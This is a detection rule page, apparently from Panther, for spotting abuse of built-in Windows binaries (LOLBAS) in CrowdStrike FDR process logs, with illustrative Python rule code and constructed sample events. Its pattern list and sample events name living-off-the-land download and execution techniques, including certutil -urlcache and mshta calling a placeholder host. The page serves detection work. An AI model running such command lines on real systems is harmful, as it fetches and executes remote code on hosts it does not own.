
Crowdstrike FDR LOLBAS

Panther Rules

Summary
The Crowdstrike FDR LOLBAS rule detects execution of Living Off The Land Binaries and Scripts (LOLBAS): legitimate, built-in system utilities that attackers repurpose so they need not drop tooling of their own. It runs against Crowdstrike.FDREvent process logs and matches the executed binary and its command-line parameters against patterns for known LOLBAS entries, for example the legacy Windows task scheduler 'at.exe'. Because many of these binaries are also used legitimately every day, the rule does not alert on the binary name alone; it looks for the parameters associated with abuse and filters out benign invocations to reduce false positives. Two unit tests accompany the rule: a positive case that fires on 'at.exe' and a negative case confirming that a common application such as Notepad does not trigger it. The rule ships disabled and must be enabled and tuned before deployment. It fires on a single matching event (threshold 1) and deduplicates over 1440 minutes, so repeated matches with the same deduplication key within a 24-hour window are grouped into one alert rather than producing one alert per execution.
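To make the matching logic concrete, here is a simplified, self-contained rule of the same shape. This is an added illustration, not the code of the Panther rule or of CrowdStrike. The LOLBAS table is a small constructed subset, the sample events are constructed, and the helper that reads raw fields from either a flat or a nested `event` object is an assumption about how the log is shaped. The field names `event_simpleName`, `ImageFileName`, `CommandLine` and `aid` are those of CrowdStrike FDR process (ProcessRollup2) events; `rule`, `title` and `dedup` follow the entry-point names a Panther Python rule exposes.

```python
import ntpath
import re

# Constructed subset of LOLBAS entries for illustration: image name -> regexes
# (case-insensitive) over the command line that indicate abuse. An empty list
# means any execution of that binary is reported, which is how at.exe (the
# page's positive-test binary) is treated here.
LOLBAS_PATTERNS = {
    "at.exe": [],
    "certutil.exe": [r"-urlcache", r"-decode\b", r"-encode\b"],
    "regsvr32.exe": [r"/i:https?://", r"scrobj\.dll"],
    "mshta.exe": [r"https?://", r"(java|vb)script:"],
    "rundll32.exe": [r"javascript:", r"url\.dll\s*,\s*(FileProtocolHandler|OpenURL)"],
}

# FDR event types that describe a process start; everything else is ignored.
PROCESS_EVENTS = {"ProcessRollup2", "SyntheticProcessRollup2"}


def _field(event, name):
    """Read a raw FDR field. Assumption: raw fields may sit at the top level
    or nested under an 'event' object, so both shapes are checked."""
    if name in event:
        return event[name]
    return event.get("event", {}).get(name)


def _image_name(image_path):
    """ImageFileName is a device path such as
    \\Device\\HarddiskVolume2\\Windows\\System32\\at.exe; keep the file name only."""
    return ntpath.basename((image_path or "").replace("/", "\\")).lower()


def matched_lolbas(event):
    """Return (image, pattern) for a LOLBAS execution, else None.
    pattern is None for binaries where any execution is reported."""
    if _field(event, "event_simpleName") not in PROCESS_EVENTS:
        return None  # not a process event
    image = _image_name(_field(event, "ImageFileName"))
    patterns = LOLBAS_PATTERNS.get(image)
    if patterns is None:
        return None  # not a LOLBAS binary
    if not patterns:
        return (image, None)  # any use of this binary is reported
    cmdline = _field(event, "CommandLine") or ""
    for pattern in patterns:
        if re.search(pattern, cmdline, re.IGNORECASE):
            return (image, pattern)
    return None  # LOLBAS binary, but with benign arguments


def rule(event):
    """Rule entry point: returning True fires the rule (threshold 1 event)."""
    return matched_lolbas(event) is not None


def title(event):
    match = matched_lolbas(event) or ("unknown", None)
    return f"LOLBAS execution: {match[0]} ran with command line '{_field(event, 'CommandLine')}'"


def dedup(event):
    """Dedup key: one alert per (sensor, binary) within the dedup period
    (1440 minutes in the page's rule). aid is the FDR sensor identifier."""
    match = matched_lolbas(event) or ("unknown", None)
    return f"{_field(event, 'aid')}:{match[0]}"


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # Positive: at.exe, the page's positive-test binary.
    {"event_simpleName": "ProcessRollup2", "aid": "a1b2c3",
     "ImageFileName": r"\Device\HarddiskVolume2\Windows\System32\at.exe",
     "CommandLine": "at.exe 13:00 /interactive cmd.exe"},
    # Negative: Notepad, the page's negative-test binary.
    {"event_simpleName": "ProcessRollup2", "aid": "a1b2c3",
     "ImageFileName": r"\Device\HarddiskVolume2\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
    # Positive: certutil as a downloader, with raw fields nested under 'event'.
    {"event_simpleName": "ProcessRollup2", "aid": "d4e5f6",
     "event": {"ImageFileName": r"\Device\HarddiskVolume2\Windows\System32\certutil.exe",
               "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/p.txt p.txt"}},
    # Negative: certutil with benign arguments (hashing a file).
    {"event_simpleName": "ProcessRollup2", "aid": "d4e5f6",
     "ImageFileName": r"\Device\HarddiskVolume2\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\tmp\setup.msi SHA256"},
    # Negative: not a process event, even though the text looks suspicious.
    {"event_simpleName": "DnsRequest", "aid": "a1b2c3",
     "ImageFileName": r"\Device\HarddiskVolume2\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/x.hta"},
]


def run_samples():
    """Evaluate the rule over the constructed events, in order."""
    return [rule(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for event, fired in zip(SAMPLE_EVENTS, run_samples()):
        print(fired, title(event) if fired else _field(event, "CommandLine"))
```

Two caveats a practitioner would want to keep in mind when tuning a rule of this kind: matching on `ImageFileName` misses a copy of the binary that the attacker has renamed, so a command line that still contains the characteristic parameters is worth matching on its own; and an entry with no parameter filter, as `at.exe` is treated here, will fire on every legitimate use of that utility, which is exactly the benign-activity filtering the rule's summary refers to.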
Categories
  • Endpoint
  • Windows
Data Sources
  • Process
  • Application Log
  • Command
Created: 2023-05-10